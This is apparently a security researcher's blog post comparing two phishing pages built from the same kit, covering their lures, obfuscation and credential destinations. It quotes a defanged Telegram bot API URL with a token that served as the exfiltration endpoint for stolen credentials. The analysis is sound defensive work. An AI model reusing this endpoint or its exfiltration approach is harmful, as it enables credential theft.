In phishing and in malspam, as in any other field, one can see certain trends develop over time. For obvious reasons, most threat actors like to use techniques and approaches that are novel and, thus, more effective. This commonly leads to adoption of the same techniques and technologies by multiple threat actors at the same time, which applies even to the use of the same phishing kits. Still, the same kit may end up looking completely different in the hands of different actors, as the following example shows.

Since our main “handler” e-mail address has been publicly listed for years on the ISC website, it has been scraped countless times by various bots and concurrently added to many address lists used in phishing campaigns. We therefore receive quite a lot of different phishing and malspam samples on it. Two of these caught my attention yesterday – not because of the content of the messages by themselves (both were run of the mill phishing messages using usual lures – an “almost full mailbox” and an “expiring domain registration”), but because of the websites they linked to.

Links from both messages led to legitimate domains that had clearly been compromised. The credential-stealing pages were nearly identical in both cases, indicating that the same phishing kit was the basis for both…

It soon turned out that this was where the similarities ended, however.

The code of the first page was not obfuscated in any way, and it was easy to identify how and where the credentials were supposed to be sent – specifically, to another compromised web server.

Although it looked nearly the same, under the proverbial hood, the second page was significantly different.

Since its authors left in the corresponding banner, we can clearly see that the HTML code was obfuscated using a simple function offered by the Snap Builder service…

This – trivial to bypass – layer of protection wasn’t the only one present. If one were to decode the HTML code into a readable form, one would still find some portions of it obfuscated through a common substitution mechanism.

Bypassing similar protection is of course reasonably simple, and in this instance, it could even be done manually, as the following example shows.

The URL, to which credentials should have been sent was:

hxxps[:]//api.telegram[.]org/bot7246282440:AAHJb7KssReEsgMVGaXOjj0TL_3mJGAMIcA/sendMessage

As we can see, although – given the visual similarities – the starting point for both credential stealing web pages was almost certainly the same phishing kit, the pages turned out to be quite different in the way they functioned and in the way they were protected.

This shows quite well that although the aforementioned claim about threat actors aligning in their use of similar techniques and tools holds true, this doesn’t necessarily mean that the end result will be the same…

-----------
Jan Kopriva
LinkedIn
Nettles Consulting